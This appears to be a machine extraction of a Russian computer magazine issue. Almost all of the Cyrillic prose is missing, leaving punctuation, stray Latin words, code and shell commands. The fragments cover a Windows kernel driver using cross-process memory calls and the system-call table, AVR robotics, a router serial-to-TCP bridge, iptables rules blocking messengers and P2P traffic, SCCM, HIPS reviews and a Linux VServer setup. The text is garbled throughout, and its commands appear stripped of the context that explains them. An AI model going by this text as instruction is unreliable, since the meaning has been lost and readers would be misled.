PLIST_ENTRY InitialEntry =
    Ldr->InitializationOrder.Flink;
PLDR_DATA_TABLE_ENTRY LdrDataTableEntry =
    CONTAINING_RECORD(InitialEntry,
        LDR_DATA_TABLE_ENTRY,
        InitializationOrder);
PLIST_ENTRY LoadOrderListHead =
    LdrDataTableEntry->LoadOrder.Blink;
.
ZwWriteVirtualMemory,
ZwReadVirtualMemory, ZwOpenProcess, ZwDuplicateObject,
ZwQueryInformationProcess ZwProtectVirtualMemory.
.
.
. ,
. : Usermode ,
ntdll.dll,
KeServiceDescriptorTable (
, , ).
,
.
KESTACKATTACHPROCESS
, , KeAttachProcess ,
Microsoft, KeStackAttachProcess,
.
.
SSDT
, ,
, MmGetSystemRoutineAddress. ,
, : PVOID func_addres =
MmGetSystemRoutineAddress( &ApiNameUnicode ). . , ,
. ,
Windows .
MmGetSystemRoutineAddress NULL.
: ,
, . .
,
DLL-
. ,
, .
,
NtAdjustPrivilegesToken.
,
. , ,
.
,
-
- .
BSOD.
, , , WinDBG - .
, , Immunity debuggerom, ,
, .
! z
DVD
dvd
,
, ,
.
>> phreaking
LOCKDOG / LINE3D@YANDEX.RU /
,
(
). , ,
, . .
? , - .
. (, , ),
. ()
, , ,
, .
.
AVR. ,
. ,
C++ .
C++.
:
, ,
.
,
. ,
, . , .
, ,
,
106
(
). ,
.
. .
. .
ATmega16 , .
( ), , .
,
, , ,
.
, . L7805
5, .
2,5 ,
, , 7,5 . , .
, .
.
DIP ( ) . ,
, USART , .
,
.
. RESET (9- ) R1
. ,
, .
, RESET
C1 .
1000 ,
, . X1 C2, C3
XTAL1 XTAL2.
, , ,
. C++.
CodeVisionAVR.
, .
.
! , , . . L293D.
D, .
.
DIP SOIC. DIP
- . L293D
,
( VSS),
( VS). L293D 600 ,
. ,
. , , ,
,
:
ATmega16 DIP-40
L7805 TO-220
L293D DIP-16 2
.
0,25
: 10 1 .,
220 4 .
: 0.1 , 1 , 22
: 1000 16 , 220
16 2 .
1N4001 1N4004
16
-:
, ,
-
,
,
.
.
, L293D 1.2 . ,
, .
: IN1 IN2 0,
IN3 IN4 , .
,
. EN1 EN2
.
. ,
,
GND
. ,
.
,
.
-, , , -.
: , -
, . , , . ,
-
. ,
. .
, ,
.
, ,
,
. :
.
:
,
, ,
.
#include <mega16.h>
#include <delay.h>
, PORTC
, :
, , .
PORTC.0 = 0xFF;
PORTC.1 = 0x00;
PORTC.2 = 0xFF;
PORTC.3 = 0x00;
0xFF , . 1, 0x00 . 0.
,
:
if (!(PINB & (1<<0))) // bit 0 of PINB reads 0
{
    ...
}
-, 0, ,
. , , . ,
,
, . delay_ms(1000)
,
. .
, . , ,
, - , ? , .
,
,
.
TSOP ( -,
)
. ; ,
.
,
. - !
OpenCV,
,
.
. z
CLUSTER / CLUSTERRR@CLUSTERRR.COM /
. , ,
ASUS!
Linux.
, ?
, . , .
, .
: , , .
-
LPT- . ,
. ,
,
.
. ,
,
.
.
ATmega16, COM-.
. : ,
. , ,
AVR +5 ,
, 0 . .
-, 5 . -, ,
. ;
. .
( PORTx, x
), . . .
COM-
USART-.
( ,
AVR). ,
;
.
- . .
, , ?
, ?
. :
,
;
, .
.
. Windows , /
, /
, , / -.
.
,
.
, . ,
, , Nintendo DS .
, ,
. COM-
COM-
. , COM-
, , ,
.
, :
.
. ,
ASUS WL-500gP. , Linux,
UART-, .
,
. !
UART COM-,
MAX3232. . , z 125 (
UART). , , Linux,
COM- ,
, .
, ?
.
. USB- ,
:
IPKG
mount /dev/scsi/host0/bus0/target0/lun0/part1 /opt
ipkg.sh update
ipkg.sh install ipkg-opt
ipkg update
, /dev/scsi/host0/bus0/target0/lun0/part1 EXT3- .
; ,
. , , -
MAX3232
DVD
dvd
.
.
ASUS
, (,
).
,
. :
http://oleg.wl500g.info.
WL-500gP, .
ipkg.
Step (z
106, Level-up ),
fdisk mke2fs; . ,
,
, . ,
:
echo "#!/bin/sh" > /usr/local/sbin/post-mount
echo "mount /dev/scsi/host0/bus0/target0/lun0/part1 /opt" >> /usr/local/sbin/post-mount
chmod +x /usr/local/sbin/post-mount
flashfs save
flashfs commit
flashfs enable
post-mount ,
. , ! , ipkg install
<_>.
,
! ?
,
: ,
.
,
.
, !
? , . ,
. ,
. .
? , .
, . . ,
. .
TCP-, .
, UART. , , ,
.
/dev/
usb/tts/0 /dev/usb/tts/1. , ,
. ,
. ,
- COM- ? ,
, . ,
:
stty -crtscts 9600 < /dev/tts/1
echo "Hello world!" > /dev/tts/1
. . , .
?
, ,
. , :
int open_uart_port()
{
    int fd;
    struct termios options;
    fd = open(UARTPORT, O_RDWR | O_NOCTTY | O_NDELAY);
    if (fd == -1)
    {
        perror("Cant open port");
        exit(1);
    }
    tcflush(fd, TCIFLUSH);
    tcgetattr(fd, &options);
    options.c_cflag &= ~PARENB;
    options.c_cflag &= ~CSTOPB;
    options.c_cflag &= ~CSIZE;
    options.c_cflag |= CS8;
    options.c_cflag &= ~CRTSCTS;
    options.c_lflag &= ~(ICANON | ECHO | ECHOE | ISIG);
    cfsetospeed(&options, B9600);
    tcsetattr(fd, TCSANOW, &options);
    fcntl(fd, F_SETFL, FNDELAY);
    printf("UART (%s) port opened\n", UARTPORT);
    return fd;
}
UARTPORT -,
. /dev/tts/1. fopen() ,
. 9600
, ; .
write() read().
, , ,
,
:
int StartListen()
{
    int sock;
    int i = 1;
    if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("Cant create socket");
        return -1;
    }
    bzero(&sa, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(CCPORT);
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(sock, (struct sockaddr *)&sa, sizeof sa))
    {
        perror("Cant bind port");
        close(sock);
        return -1;
    }
    if (listen(sock, 15))
    {
        perror("Cant listen port");
        close(sock);
        return -1;
    }
    if (ioctl(sock, FIONBIO, &i))
    {
        perror("Cant set non-blocking mode");
        close(sock);
        return -1;
    }
    printf("Listening on port %u\n", CCPORT);
    return sock;
}
CCPORT , . ,
( ).
.
. , ,
. COM-.
,
.
Windows,
Borland Delphi. ,
.
,
. , :
, ,
..
, .
, .
, , , .
-! lighttpd, , . PHP.
PHP?
, .
,
-, , .
.
rrdtool,
,
. ,
, .. .
, ,
SMS, - .
.
,
.
,
. ,
- . z
>> SYN/ACK
_SSH3R1FF/ SSH3R1FF@GMAIL.COM /
IM, Skype, P2P
, , , , , ,
. , ,
.
,
IM-
: ,
.
90% , 10%
, ,
,
.
http-
,
. ,
, . .
, , tcpdump
:
$ sudo tcpdump -i eth0
:
21:33:55.687042 IP 10.10.10.10.33018 > 64.12.26.150.aol: . ack 11334 win 63920
, , IP- ICQ, , .
grep aol
/etc/protocols, tcpdump '-n'
. , :
$ sudo tcpdump -i eth0 dst portrange 5190
, . IM-.
ICQ, ,
login.icq.com 5190. , 5190
443.
,
:
$ host login.icq.com
login.icq.com is an alias for login.messaging.aol.com.
login.messaging.aol.com has address 64.12.161.153
, login.icq.com
, , ,
. . ,
ICQ
,
.
dig
(dig login.icq.com).
. , -
(
iptables,
):
iptables -A FORWARD -p TCP --dport 5190 -j DROP
iptables -A OUTPUT -d login.icq.com -j REJECT
iptables -A OUTPUT -d id.rambler.ru -j REJECT
, IP
,
,
. ,
www.icq.com/icq2go, -.
, IP (
dig):
iptables -A OUTPUT -d 64.12.0.0/16 -j REJECT
iptables -A OUTPUT -d 205.188.0.0/16 -j REJECT
icq2go
(- www.meebo.com), IM- .
. tcpdump',
, Yahoo! Messenger
TCP-: 5000-5001,5050,5100 UDP-: 5000-5010, MSN 1863, Jabber/Gtalk
5222, 5223, IRC 6667-6669, ail : 2041, 2042.
, ! ,
(, IRC ..)
.
. ,
Yahoo Messenger:
iptables
iptables
iptables
iptables
iptables
iptables
-A
-A
-A
-A
-A
-A
FORWARD
FORWARD
FORWARD
FORWARD
FORWARD
FORWARD
-p
-p
-p
-p
-d
-d
DNS-,
. , DNS-
,
tcpdump. DNS- OpenBSD,
BIND 9.3.4:
$ sudo vim /var/named/etc/named.conf
logging {
    // channel that receives the query log
    channel queries_ch {
        // log file (the path is relative to the chroot directory)
        file "/log/queries.log" versions 5 size 10m;
        // severity level (debug, info)
        severity debug;
        // prefix each entry with its category, severity and time
        print-category yes;
        print-severity yes;
        print-time yes;
    };
    // send query and resolver messages to this channel
    category queries { queries_ch; };
    category resolver { queries_ch; };
};
MIPKO EMPLOYEE
MONITOR
: ICQ ,
, ,
. , , . . ,
, .
,
, .
MIPKO Employee Monitor (www.mipko.ru).
,
.
.
.
l7-filter 10
12 , .
, /proc/net/layer7_numpackets:
$ sudo sh -c "echo 16 > /proc/net/layer7_numpackets"
- ICQ2GO
HOST DIG,
ICQ
named
DNS-:
INFO
info
Squid
z - 2008
.
Netfilter
,
l7-filter.
HTTP://WWW
links
Netfilter/Iptables
netfilter.org.
Squid www.squidcache.org.
l7-filter l7-filter.
sf.net.
IPP2P ipp2p.org.
P2PWall www.
lowth.com/p2pwall.
:
$ sudo tail -f /var/named/log/queries.log
30-Jun-2009 16:22:15.036 resolver: debug 1: createfetch: ns.mail.ru A
30-Jun-2009 16:22:35.179 queries: info: client 192.168.1.21#64773: view internal: query: www.meebo.com IN A +
30-Jun-2009 16:22:35.868 queries: info: client 192.168.1.21#63341: view internal: query: js.meebo.com IN A +
netstat/tcpdump/queries.log, .
. , iptstate TOP-
. , :
$ sudo iptstate --dstpt-filter=5190
IM- , 80/443 . iptables ,
, , Squid'
. ,
,
( Squid
z 2008 ). .
, squid.conf :
, IM-,
mail.ru, ,
:
acl im_nets src "/usr/local/etc/squid/icq_nets.acl"
http_access deny im_nets !admin
Sarg ( - Squid) , .
IPTABLES ,
,
.
OSI iptables.
2.6.14, ( patcho-matic-ng), , /
. string (xt_string).
, . , :
$ ls /lib/modules/2.6.24-24-generic/kernel/net/netfilter/xt_string.ko
:
$ sudo iptables -A FORWARD -m string --string "icq.com" \
    --algo kmp --to 65535 -j DROP
, ,
. , /. ,
TCPDUMP
,
Download Master:
$ sudo iptables -A FORWARD -m string --string "DownloadMaster" \
    --algo kmp -j REJECT
, . '--algo' , ,
. kmp ( Knuth-Pratt-Morris) bm
( Boyer-Moore). ,
, bm . kmp bm,
. , string '--hex-string',
. ,
, , iptables.
.
, . l7-filter (l7-filter.
sf.net),Zorp(www.balabit.com/network-security/zorp-gateway),IPP2P(ipp2p.
org) P2PWall (www.lowth.com/p2pwall). ,
cp /boot/config-`uname -r` /usr/src/linux/.
l7-filter ( ), :
iptables -A FORWARD -m layer7 --l7proto aim -j DROP
iptables -A FORWARD -m layer7 --l7proto skypetoskype -j DROP
iptables -A FORWARD -m layer7 --l7proto skypeout -j DROP
: .
L7-FILTER
iptables. (
2.6.28):
$ sudo patch -p1 < ../netfilter-layer7-v2.21/for_older_kernels/kernel-2.6.22-2.6.24-layer7-2.18.patch
iptables:
$ cd ../iptables
$ iptables -V
iptables v1.3.8
$ sudo patch -p1 < ../netfilter-layer7-v2.21/iptables-1.3-for-kernel-2.6.20forward-layer7-2.21.patch
$ sudo chmod +x extensions/.layer7-test
iptables:
$ make KERNEL_DIR=/usr/src/linux
$ sudo make install
, ipp2p-0.8.2/Makefile:36:
You need to install iptables sources and maybe set IPTABLES_SRC.
, ,
iptables.h. /usr/src/iptables.
Makefile :
$ sudo nano Makefile
IPTABLES_SRC = $(wildcard /usr/src/iptables)
#CFLAGS = -O3 -Wall
. , ,
l7-filter, IPP2P make oldconfig && make prepare ( IPP2P
). libipt_ipp2p.
so iptables:
$ sudo cp libipt_ipp2p.so /usr/lib/iptables
:
:
$ sudo make menuconfig
! :
$ sudo iptables -m ipp2p --help
. iptables
-m layer7 --help . , BitTorrent, AIM Skype, :
iptables -A FORWARD -m layer7 --l7proto bittorrent -j DROP
, :
iptables -A FORWARD -m ipp2p --edk --kazaa --gnu --bit \
--apple --dc --soul --winmx --ares -j DROP
, . USB/CD/DVD, , . z
GRINDER
/GRINDER@SYNACK.RU /
SCCM:
IT-
,
, , IT- .
GPO - Radmin.
, .
Microsoft System Center Configuration
Manager, IT-
.
SCCM SCCM 2007 R2 (www.microsoft.com/
systemcenter/configurationmanager)
Systems
Management Server (SMS).
IT-.
System Center , Configuration Manager .
, SCCM
, , , Microsoft, (Desired Configuration,
: , ,
),
.
SC (www.microsoft.com/systemcenter)
, .
:
Data Protection Manager
Windows;
Operations Manager ;
Essentials ,
,
;
Virtual Machine Manager
;
Capacity Planner ,
,
,
;
Service Desk
, ;
Mobile Device Manager (MDM)
Windows Mobile;
Reporting Manager
.
,
,
. (Site system)
,
SCCM. SCCM
single-site multi-site.
SCCM.
(Primary site, ) (Secondary site,
Primary site). Primary
(Central
site). , , -
(). SCCM :
(Management point);
(BITS-enabled
distribution point);
(Reporting
point);
(Software Update Point);
(Server
locator point);
(Fallback status point, Win2k8).
C ,
. Branch
distribution point.
(3-5
) .
SQL-.
Client Agent,
. Native
( )
Mixed ( SMS). Native (
HTTPS). , ( IP, ).
, ( ) .
SCCM
SCCM R2,
WinXP/2003/VistaSP1/2k8, SCCM SP2, Win7/2k8R2/2k8SP2.
: WinXP, Vista
Win7 , Branch
distribution point.
. R2 :
SP1 Full. ,
VHD- SCCM.
, , SCCM SP1
R2. SCCM, , , , .
, SCCM: single-site
multi-site, , , . ,
- .
:
Configuration Manager
2007 Configuration
Manager 2007, TechNet.
PIII 733 , 256
, 5 10 . , ,
, , , .
, .
SQL Server 2005 SP2 (go.microsoft.com/fwlink/?LinkId=69795), . Express Edition . , : IIS 6.0, MMC
3.0, NET Framework 2.0, ASP.NET, BITS (Background Intelligent Transfer
Service) WebDAV.
( ), Win2k3 . , Primary Secondary
RODC ( ). Primary
, ,
, ,
, . Secondary
.
SCCM Win2k8 singlesite Primary site. ,
, AD, SQL- .
, BITS. , IIS
7.0, , .
,
, . . IIS
ASP.NET ASP ( ), Windows
, .
PREREQUISITE
CHECKER , SCCM
SCCM. : (Primary, Secondary CM Console); Primary
, SQL-, WSUS
Management Point (,
). WSUS , SDK Server
. , SDK WSUS,
,
, . SDK-
WSUS, .
; , , . Success ( ),
SCCM.
SCCM - ,
,
, .
CM, ,
, . SCCM
INFO
info
WSUS 3.0
SP1 Win2k8
,
z 2009
.
Run the prerequisite
checker. .
HTTP://WWW
links
SCCM 2007 www.
microsoft.com
/systemcenter/
configuration
manager.
TechNet, SCCM technet.
microsoft.com/ru-ru/
configmgr.
SCCM
DVD
dvd
, ,
SCCM 2007 Win2k8
.
, . ,
(site boundary), , ,
(Discovery) (approval).
. SCCM , , site
boundary.
Database
Site management Site settings.
Boundaries. , , , New Boundary (Description), ,
(
), (Type).
; :
IP-subnet (), Active Directory site, IPv6 prefix IPaddress range. , , . Network Connection,
, :
Fast (LAN) Slow. , Boundaries,
.
Discovery methods, 6 ,
. 4 Active Directory ,
, Security;
Heartbeat ( ) Network ( ). Network discovery ,
AD. ,
. , , Enable ... ( Heartbeat
Discovery).
, AD, ( , LDAP
..), , . -
,
.
, Polling Schedule
. , Run discovery as soon as possible.
Active Directory attribute , .
Network discovery , . ,
Type of discovery : , + + . Subnets,
Domains, SNMP, SNMP Devices DHCP
. ,
Subnets ,
, Schedule
.
. .
. . Wake On
LAN
, /. Ports
. Advanced
, , hardware ID.
Automatically create new client records .... , Manually resolve conflicting records. Advanced
SCCM AD . Security
SCCM. , , Site Mode (, ) (Native
Mixed). ,
Approval settings:
Manually approve each computer ,
,
, ;
Automatically approve computers in trusted
domains (recommended) Discovery ;
Automatically approve all computers (not
recommended)
SCCM
. , , AD, .
, .
This site containts only ConfigMgr 2007
clients SCCM- (
SMS ).
, .. (collection) (, ..)
, .
Computer management Collections. (, ). All Systems
, SCCM. ,
Update Collection Membership .
. , Client , , Approved/Assigned/Blocked/Active
. . : ( \\server\site\Client\ccmsetup.exe);
Push-; AD Logon,
.
. Client Push Install () SCCM.
Site settings Client installation method.
Client Push Install .
SCCM
, .
, .
,
,
. z
GRINDER
/ GRINDER@SYNACK.RU /
, . ,
, .
HIPS.
HIPS (Host Intrusion
Prevention System, )
.
,
(
, ),
, / /, ,
.
API-
,
, , .
,
, .
, HIPS .
.
,
, , . ,
, Prevx ( )
, -
(
) , .
.
(
, API-) HIPS
. .
: ,
- HIPS,
, ?
,
,
HIPS ,
.
, HIPS.
. .
DEFENSEWALL
: SoftSphere Technologies
Web: www.softsphere.com/rus
: Intel Pentium x86
300 , 256 / (x86/x64) 1 , 512
( WinXP Vista )
: Windows NT/2000/XP/2003/Vista
DefenseWall /
.
(Sandbox), .
-, P2P, IM-
.. , , .
( CD/DVD
). :
,
, .
, ,
. , .
.
(,
..), .
( ).
, ,
,
.
. ,
, .
. DefenseWall , .
.
: , , ,
. .
, , .
.
/ (GoBanking/Shopping)
, .
.
Expert Mode,
,
.
, ,
(Apache, IIS etc)
, ,
(CodeRed, Slammer, Sasser, Blaster), . ,
, ,
.
SAFE'N'SEC
: S.N.Safe&Software
Web: www.safensoft.ru
: Intel Pentium x86 300 , 256
WinXP / (x86/x64) 1 , 512 Vista
: Windows XP/Vista
HIPS Safe'n'Sec,
S.N.Safe&Software,
V.I.P.O. (Valid Inside Permitted Operations). .
Safe'n'Sec .
, ( SHA-256).
, , ,
, , .
, ,
.
,
. , , .
.
Safe'n'Sec , .
. Safe'n'Sec 2009. Safe'n'Sec
Enterprise . :
Safe'n'Sec Admin Explorer ;
;
Service Center ,
; , .
, , Dr.Web -.
, .
, ,
, , USB-.
, Safe'n'Sec ,
. , Kaspersky AntiVirus 2009 .
info
HIPS
.
McAfee
:
,
.
Prevx
.
,
, HIPS
.
.
(), . IPS
, ,
CISCO SECURITY
AGENT (CSA)
Cisco, 2003
Okena, HIPS
StormWatch Agent,
. CSA
, Windows 2k Vista, RHEL 3.0/4.0, Solaris 8/9
VMware.
. ,
, ,
,
( ,
COM-), , . ,
.
.
. ,
(, , CD/DVD), ..
Cisco Management Center for Cisco Security Agents.
, CSA Cisco IPS, ,
(NAC),
Cisco MARS. ,
.
McAfee .
,
. HIPS , () ( ).
Server, ,
- (Apache 1.3./2., Sun ONE/Java
Web Server) (SQL Server 2000)
(Directory traversal, DoS, SQL
injection .).
HIPS
,
, ePolicy Orchestrator
(
McAfee). , HIPS
ePO.
ePO: 3.6.1 MMC, 4.0.0 -.
HTTP/
HTTPS .
ePO-
Win2k SP4/2003 SP1/SP2/R2,
Win2k/XP/2003/Vista. SQL- SQL Server 2005
Express Edition; SQL Server 2000/2005.
PREVX 3.0
: Prevx Limited
Web: prevx.com
:
: Windows 98/NT/2000/XP/2003/Vista/2008/
Se7en
Prevx 2004 Community IPS,
. Cloud computing
, (software-as-service, SAAS)
Prevx .
Prevx ,
. , .
EPO:
MCAFEE
.
(Prevx Cloud Community Database).
IPS , .
, 768
.
, . . ,
2-4 . , .
, ,
,
.
.
,
. 4 10 , .
250 .
: ( ), (
) . . Prevx , ,
Windows;
.
Home, , Business Enterprise
, . Free Malware Monitor,
, , ,
. ,
.
Prevx ,
: ,
, .
.
,
.
PREVX
PREVX : ,
-
, , . HIPS .
. z
?
, , HIPS
,
,
, . HIPS
.
.
DVD
dvd
Safe'n'Sec,
DefenseWall Prevx.
NATHAN BINKERT
/ NAT@SYNACK.RU /
Fujitsu PRIMERGY RX200 S5
> :
D 2786 ( Intel 5500)
> :
1 2 Intel Xeon 55xx
> :
1 96 DIMM DDR3 1066/1333 (12
)
ECC, SDCC, Memory Scrubbing,
> :
8 2,5- SAS
> RAID:
RAID- 0/1
RX200 S5 Fujitsu,
HP IBM,
.
/ Intel Xeon 55xx,
SAS, 96 DDR3.
RAID 0/1 PCI-X RAID
0,1,10,5,50,6,60. .
-
> :
2 Ethernet 1 /
1 iRMC S2 (10/100
/)
> :
,
( 1 + 1)
> :
1 PCI-Express x4 ()
2 PCI-Express x8 (1
, 1 )
> :
ServerView Local Service
Panel (LSP)
(iRMC S2, 32
),
IPMI 2.0
> :
Cool-safe
6
(5+1)
> :
(1U, 431x765x43 )
> -:
7 USB 2.0 (3 , 3
, 1 )
2 VGA (1 )
1 RS-232-C (9-)
> :
3
.
Blue-Ray
Cool-safe.
, Cool-safe,
Computational
Fluid Dynamics, ,
,
.
. ,
89%, -
Green IT.
IPMI 2.0
. .
Microsoft Windows
Server 2003/2008, Novell SUSE Linux Enterprise
Server, Red Hat Enterprise Linux, VMware
Infrastructure.
Linux .
: 60000 .
NATHAN BINKERT
/ NAT@SYNACK.RU /
:
R-Style Marshall NP 2010
> :
16 DDR2-533 DDR2-667
ECC (8 )
> :
IDE-
6 SATA
4 SAS
> RAID:
RAID 0, 1, 10, 5
> :
2 Intel Gigabit Ethernet
> :
550
650
R-Style Marshall NP 2010
> :
2/4- Intel
Xeon Processor 50xx, 51xx 53xx
667 , 1067 1333
> :
2 PCI Express x4
2 PCI-X 64-bit/133
1 PCI 32-bit/33
> :
Intel 5000V
> -:
7 USB 2.0 (4 , 2 , 1 ,
USB FDD)
2 RS-232-C
Marshall NP 2010
R-Style Computers.
,
( ).
,
, .
Intel Xeon 5000,
DDR2-667 ECC,
16 , 3.5"
SAS/SATA-.
,
web- ( ).
550
650
.
DVDRW - USB-.
2 DB-9 (9 pin, )
2 PS/2
> :
: 80
:
120
SAS/SATA HDD:
92
> :
ATI ES1000 (16 SDRAM)
CD, DVD/CDRW DVDRW
> :
(452x235x483)
(6U, 235447483)
> :
3
.
(, ,
, -
).
3
100 , .
: Microsoft Windows Server
2003/2008.
: 35000 .
/ ZOBNIN@GMAIL.COM /
Linux VServer
, ?
, root? ?
Linux VServer
.
()
FreeBSD Jail.
,
(, /dev /
proc, ),
IP-.
,
, Xen, VMWare KVM,
,
.
,
.
,
,
:
( 2-3%)
.
- ,
. ,
, ,
,
,
,
, ,
.
- .
VSERVER? UNIX-
. FreeBSD
Jail, Solaris
(Zones), Linux OpenVZ Linux
VServer.
OpenVZ (openvz.org)
, ,
.
Linux VServer (linux-vserver.org),
,
. OpenVZ
VPS ( ) , VServer
FreeBSD
Jail. Linux VServer
( 7 ) ,
Linux;
,
.
Linux VServer
: Linux-
. VServer
,
Ubuntu 9.04,
,
kernel.org .
, Ubuntu 9.04,
2.6.28, , .
1. apt keyring
VServer:
$ sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com BB9BFB5B
2.
VServer /etc/apt/sources.list:
deb http://ppa.launchpad.net/christoph-lukas/ppa/ubuntu jaunty main
deb-src http://ppa.launchpad.net/christoph-lukas/ppa/ubuntu jaunty main
3. :
$ sudo apt-get update
$ sudo apt-get install linux-image-vserver linux-headers-vserver util-vserver
,
.
1. :
# cd /usr/src
# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.28.7.tar.bz2
# wget http://vserver.13thfloor.at/Experimental/patch-2.6.28.7-vs2.3.0.36.8.diff
2. ,
:
# tar -xjf linux-2.6.28.7.tar.bz2
# cd linux-2.6.28.7
# cp /boot/config-X.X.X .
# patch -p1 < ../patch-2.6.28.7-vs2.3.0.36.8.diff
# make menuconfig
[Figure: Linux host system with eth0 82.195.23.28 and an iptables SNAT rule, serving a Linux VPS on the eth0 alias 192.168.1.1]
3. Linux VServer:
Enable Legacy Kernel API API .
Enable Virtualized Guest Time . ,
,
Enable Proc Security , , /proc .
4. :
# make
# make modules_install
# cp arch/i386/boot/bzImage /boot/vmlinuz-2.6.28.7-vs2.3
5. :
# vi /boot/grub/menu.lst
title Linux 2.6.28.7-vs2.3
root (hd0,0)
kernel /boot/vmlinuz-2.6.28.7-vs2.3 root=/dev/hda1 ro
initrd /boot/initrd.img-2.6.28.7-vs2.3
boot
6. :
# cd /tmp
# wget http://ftp.linux-vserver.org/pub/utils/util-vserver/util-vserver-0.30.215.tar.bz2
# tar xjf util-vserver-0.30.215.tar.bz2
# cd util-vserver-0.30.215
# ./configure --prefix=/usr --sysconfdir=/etc
# make install
( Linux VServer),
. ,
,
, tag.
, , ,
.
/etc/fstab, , , /var/lib (
/var/lib/vservers),
tag. :
/dev/sda3 /var ext3 tag 1 1
reiserfs,
attrs. .
Chroot Barrier,
,
:
# setattr --barrier /var/lib/vservers
kernel.vshelper , :
# echo "kernel.vshelper = /usr/lib/util-vserver/vshelper" >> /etc/sysctl.conf
# sysctl -p
Linux-,
. ,
()
. ftp://ftp.
pld-linux.org/people/hawk/vserver-templates/,
CentOS, Debian, Fedora Ubuntu,
VServer.
Ubuntu ( ,
):
$ cd /tmp
$ wget ftp://ftp.pld-linux.org/people/hawk/vserver-templates/Ubuntu/jaunty-i386.tar.bz2
VSERVER-STAT
PS
INFO
info
/
var/lib/vserver.
, /
etc/vserver/.defaults/
vdirbase
.
vserver
,
(vserver
delete),
(vserver exec),
(vserver
rpm, vserver apt-get).
/var/lib/
vservers/vps1 .
, vps1, ( ),
vps1.
host.ru,
eth0 IP- 192.168.1.1,
(plain /sbin/init). ,
/tmp/
jaunty-i386.tar.bz2, Ubuntu 9.04
(Jaunty Jackalope).
VServer
, (
),
, man- vserverbuild.
:
# vserver vps1 start
# vserver-stat
LINUX VSERVER
- IP-
.
(0
, 1 ..)
, 1
:
// eth1
-
# echo "eth1" > dev
// IP-
# echo "192.168.1.2" > ip
# echo "24" > prefix
, ifconfig,
,
. VServer
,
.
. , /etc/fstab,
/etc/vservers/vps1/fstab.
,
/dev, /proc /tmp, , , - (
Gentoo):
/usr/portage /usr/portage none bind,rw 0 0
WARNING
.
:
# vserver vps1 stop
warning
top ps
,
.
,
vps vtop.
, ,
.., /etc/vservers/_. /etc/vservers/vps1 .
interfaces,
0.
,
. Linux VServer,
FreeBSD Jail,
IP- ,
,
.
:
1. IP- ( ).
2. NAT -
,
-
.
. SNAT,
:
# chxid -URx -c vps1 /var/lib/vservers/vps1
,
vdlimit,
:
# vdlimit --xid vps1 /var/lib/vservers/vps1
, /etc/
vservers/vps1/dlimits/root vdlimit '--remove',
:
/DEV
,
# iptables -t nat -A POSTROUTING -s 192.168.1.1/24 \
-d ! 192.168.1.1/24 -j SNAT --to-source < IP>
DNAT,
IP- (
web-, VServer):
# iptables -t nat -A PREROUTING -s ! 192.168.1.1/24 \
-m tcp -p tcp --dport 80 \
-j DNAT --to-destination 192.168.1.1:80
, , dlimits rlimits.
,
-. , /etc/vservers/vps1/dlimits, , :
# cd /etc/vservers/vps1
# mkdir dlimits
( ):
# mkdir dlimits/root
# cd dlimits/root
, :
# echo "/var/lib/vservers/vps1" > directory
( ):
# echo "10000" > inodes_total
, ( 10 ):
# echo "10485760" > space_total
root :
# echo "5" > reserved
,
vps1 (, , ):
/etc/vservers/_/
rlimits. Linux VServer setrlimit(2)
. 22
(15 + 7,
Linux VServer), ( = 4 x86):
cpu , ,
fsize
rss
nproc
as
nice ,
nsock
openfd
,
/etc/
vservers/_/rlimits. , 100 (25600*4 ):
# mkdir /etc/vservers/vps1/rlimits
# echo "25600" > /etc/vservers/vps1/rlimits/as
, Linux VServer ,
, ,
. , , /
etc/vservers/_/ccapabilities.
:
SET_UTSNAME
setdomainname(2) sethostname(2)
SET_RLIMIT setrlimit(2)
RAW_ICMP ""
SYSLOG syslog(2)
SECURE_MOUNT mount(2)
SECURE_REMOUNT
BINARY_MOUNT /
QUOTA_CTL
ADMIN_MAPPER "device mapper"
ADMIN_CLOOP loop-
KTHREAD
,
flags, nflags, bcapabilities ncaps.
linux-vserver.org/util-vserver:Capabilities_
and_Flags.z
>> units
/ LOZOVSKY@GAMELAND.RU /
PSYCHO:
, , PSYCHO-, ,
,
- , , , .
,
,
, -. ,
,
-, ,
.
, -
,
.
, ,
,
, -.
, homo sapiens.
.
,
,
. -
,
?
?
?
,
, , ?
.
.
(- 8-10
) . ,
.
.
?
.
,
/ ,
. , , ,
.
, ,
,
.
,
IT-.
,
,
.
.
,
(
) .
. -
, - , -
.
,
.
. ,
, , ,
. ,
-, ,
-, , ,
. ,
,
,
, , , . ?
, ,
. , .
.
?
, ,
,
?
,
, ,
.
,
, .
, .
,
- .
, ,
,
.
-
. . ?
! -
,
,
,
. ,
25 , , ,
, , , .
, ,
,
, , , ,
. , ,
-
-
-, ,
.
, ,
.
. ,
,
,
,
.
( !) .
,
. , ,
,
,
.
,
( , , ?),
. ,
:
,
. .
,
,
.
,
, .
, ,
,
.
,
,
,
.
, ,
! ,
! ,
, ,
30-45 .
,
?
. ,
.
,
, . -
(
), -
. .
, .
(-, , ,
), ,
,
.
, . .
( , )
.
,
,
.
,
(---)
.
,
,
,
. ,
,
,
.
. .
.
.
, , .
.
,
(,
). ?
.
, ,
,
,
.. ,
,
.
: -
, -
, - ,
.
.
, ,
,
, .
,
, ,
, ,
. ! , , ,
!
,
,
, , .
,
-, ,
,
.
z: ,
?
..: -
.
, -
.
,
, ?
, -
.
,
, ,
. , ,
.
,
?
-
, ,
.
z: ,
. :
,
,
?
..: . , .
.
z: ?
..: .
-,
.
.
,
.
z: ,
?
,
?
..:
,
( ,
).
, ,
,
. ?
,
,
(, ,
,
).
. ,
, ,
, .
.
, , , ,
( )
.
.
, ,
. .
.
z: -
?
?
..:
. .
,
.
, ,
.
.
,
.
, ,
.
, :
.
.
.
(
), , .
, ,
.
z: , , -
.
.
..: . ,
, ,
, .
,
, ,
. , .
-,
.
z: -
,
?
..:
.
, . ,
.
, .
, ,
- . , , .
, ,
.
z: . -
. ,
?
.
..:
:
1. ,
,
.
2. , ,
.
3. .
. , ,
, ,
. ! ,
,
, , ,
.
, .
,
,
.
,
.
4. , .
. ,
, ,
. ,
.
,
.
,
,
.
, -
.
,
,
,
,
,
.
,
,
,
, .
, ,
.
,
,
,
.
,
. ,
, ,
, ,
:
,
,
.
,
, ,
,
,
.
,
( -
).
,
,
,
.
, ,
,
,
java
programming for dummies.
,
. ,
, ,
/
. ! z
